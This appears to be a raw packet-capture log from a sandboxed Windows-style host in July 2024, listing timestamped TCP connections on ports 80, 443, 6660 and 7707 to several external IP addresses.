Jul 6, 2024 13:28:28.404503107 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.408504009 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.408505917 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.456335068 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.461549044 CEST	80	49860	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.461699009 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.461699009 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.466372013 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.466434002 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.466590881 CEST	80	49860	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.466675997 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.466676950 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.467742920 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.471852064 CEST	80	49860	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.506541967 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:28.506573915 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:28.506845951 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:28.507016897 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:28.507030010 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:28.883445978 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.883498907 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.883544922 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.895231009 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.928188086 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.928205967 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.928268909 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.928553104 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.928563118 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.928894043 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.928960085 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.928999901 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.929485083 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.963222980 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.963269949 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.963337898 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.963679075 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.963692904 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.972254992 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:28.972323895 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:28.974025011 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:28.974031925 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:28.974257946 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:28.975646973 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:29.016539097 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:29.113188982 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:29.113248110 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:29.113287926 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:29.113301992 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:29.113362074 CEST	443	49861	172.67.209.71	192.168.2.4
Jul 6, 2024 13:28:29.113404989 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:29.113698006 CEST	49861	443	192.168.2.4	172.67.209.71
Jul 6, 2024 13:28:29.580974102 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:29.583456039 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:29.583466053 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:29.609265089 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:29.618982077 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:29.618999004 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.128591061 CEST	80	49860	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.128695011 CEST	80	49860	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.129106045 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.132627010 CEST	49860	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.138117075 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.138170958 CEST	443	49862	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.138230085 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.138698101 CEST	49862	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.237464905 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.242542028 CEST	80	49864	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.242626905 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.242759943 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.247728109 CEST	80	49864	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.247777939 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.252711058 CEST	80	49864	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.439471960 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.439532995 CEST	443	49863	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.439589024 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.440033913 CEST	49863	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.474232912 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.474253893 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.474410057 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.474730015 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.474744081 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.509563923 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.509572983 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.509788990 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.510040998 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:30.510052919 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:30.961313963 CEST	80	49864	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.962924957 CEST	80	49864	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:30.962984085 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:30.964732885 CEST	49864	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.065959930 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.071254015 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.071326971 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.071362972 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.076524973 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.076598883 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.081747055 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.129422903 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.135102034 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:31.135119915 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.144392967 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.146049976 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:31.146056890 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.784235954 CEST	49852	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:31.784677029 CEST	49868	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:31.908749104 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.908766031 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.908773899 CEST	80	49867	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:31.908849001 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.908854008 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:31.908900976 CEST	443	49866	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.909095049 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.909126997 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:31.909149885 CEST	443	49865	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:31.909452915 CEST	6660	49852	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:31.909465075 CEST	6660	49868	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:31.909482002 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:31.909666061 CEST	49868	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:32.063143015 CEST	49867	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.065788031 CEST	49866	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.077805042 CEST	49865	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.096065044 CEST	49868	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:32.101001024 CEST	6660	49868	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:32.142023087 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.142070055 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:32.142180920 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.142577887 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.142591000 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:32.175066948 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.180272102 CEST	80	49870	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:32.180366039 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.180434942 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.185386896 CEST	80	49870	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:32.185480118 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.190362930 CEST	80	49870	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:32.938951969 CEST	80	49870	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:32.938970089 CEST	80	49870	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:32.939033985 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.940809011 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:32.943713903 CEST	49870	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:32.944897890 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:32.944931030 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:33.052584887 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.057600021 CEST	80	49871	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.057666063 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.057733059 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.062513113 CEST	80	49871	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.062560081 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.067414999 CEST	80	49871	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.519475937 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:33.519531965 CEST	443	49869	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:33.519582033 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:33.519989014 CEST	49869	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:33.535635948 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:33.535665035 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:33.535726070 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:33.535984993 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:33.536003113 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:33.549087048 CEST	6660	49868	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:33.549143076 CEST	49868	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:33.806818008 CEST	80	49871	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.807092905 CEST	80	49871	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.807284117 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.810621023 CEST	49871	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.925812960 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.930660009 CEST	80	49873	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.930753946 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.931746006 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.936672926 CEST	80	49873	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:33.939966917 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:33.944931030 CEST	80	49873	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:34.193811893 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.196048975 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.196069002 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.751178026 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.751241922 CEST	443	49872	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.751298904 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.751674891 CEST	49872	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.772316933 CEST	80	49873	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:34.773698092 CEST	80	49873	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:34.773750067 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:34.775906086 CEST	49873	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:34.855087996 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.855120897 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.855192900 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.855453014 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:34.855467081 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:34.878463030 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:35.333213091 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:35.333287001 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:35.333379030 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:35.338160038 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:35.338249922 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:35.343223095 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:35.502460957 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:35.504286051 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:35.504307985 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:36.336802006 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.336818933 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.336869001 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.336926937 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.337122917 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:36.337151051 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.337196112 CEST	443	49874	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:36.337300062 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:36.337852001 CEST	80	49875	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.337944031 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.340791941 CEST	49875	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.340794086 CEST	49874	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:36.411668062 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:36.411686897 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:36.411961079 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:36.411961079 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:36.411984921 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:36.456310034 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.461141109 CEST	80	49877	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.461616993 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.461673021 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.468349934 CEST	80	49877	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.468810081 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:36.474627018 CEST	80	49877	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:36.930953979 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:36.936055899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:36.936146021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:36.941174984 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:37.072374105 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.073926926 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.073949099 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.172996044 CEST	80	49877	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:37.173892975 CEST	80	49877	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:37.173940897 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.178141117 CEST	49877	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.284507036 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.291922092 CEST	80	49878	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:37.291985035 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.292021990 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.300739050 CEST	80	49878	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:37.300781965 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:37.305790901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:37.308439970 CEST	80	49878	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:37.346323013 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:37.441499949 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:37.498215914 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:37.505506992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:37.505556107 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:37.510413885 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:37.804269075 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.804328918 CEST	443	49876	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.804488897 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.804902077 CEST	49876	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.855102062 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:37.859664917 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.859680891 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.860028028 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.860028028 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:37.860052109 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:37.860272884 CEST	80	49879	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:37.860341072 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:37.860553026 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:37.867341042 CEST	80	49879	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:38.015081882 CEST	80	49878	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.016045094 CEST	80	49878	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.016108990 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.018394947 CEST	49878	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.128509045 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.133807898 CEST	80	49881	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.133960962 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.134119034 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.139235020 CEST	80	49881	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.139416933 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.144224882 CEST	80	49881	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.344912052 CEST	80	49879	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:38.471754074 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:38.515552998 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:38.519756079 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:38.519769907 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:38.565388918 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:38.565417051 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:38.565490007 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:38.571757078 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:38.571768045 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:38.593585014 CEST	49868	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:38.593988895 CEST	49883	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:38.598500013 CEST	6660	49868	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:38.598731995 CEST	6660	49883	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:38.599303961 CEST	49883	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:38.599766016 CEST	49883	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:38.605601072 CEST	6660	49883	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:38.892610073 CEST	80	49881	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.893168926 CEST	80	49881	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:38.893224001 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:38.897305965 CEST	49881	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:39.044420004 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:39.044507027 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:39.047687054 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:39.047692060 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:39.047879934 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:39.103140116 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:39.103195906 CEST	443	49880	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:39.103250027 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.186050892 CEST	49880	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.226881027 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:39.233236074 CEST	80	49884	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:39.233305931 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:39.235518932 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:39.236954927 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:39.240468025 CEST	80	49884	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:39.240536928 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:39.245678902 CEST	80	49884	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:39.249296904 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:39.267498016 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.267517090 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:39.267580032 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.267870903 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.267880917 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:39.292510033 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:39.926650047 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:39.931762934 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:39.931791067 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:40.039648056 CEST	80	49884	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:40.039664984 CEST	80	49884	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:40.043592930 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.043592930 CEST	49884	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.159414053 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.168834925 CEST	80	49886	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:40.168982029 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.168982029 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.179518938 CEST	80	49886	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:40.179739952 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:40.189644098 CEST	80	49886	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:40.234683990 CEST	6660	49883	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:40.234914064 CEST	49883	6660	192.168.2.4	94.232.249.204
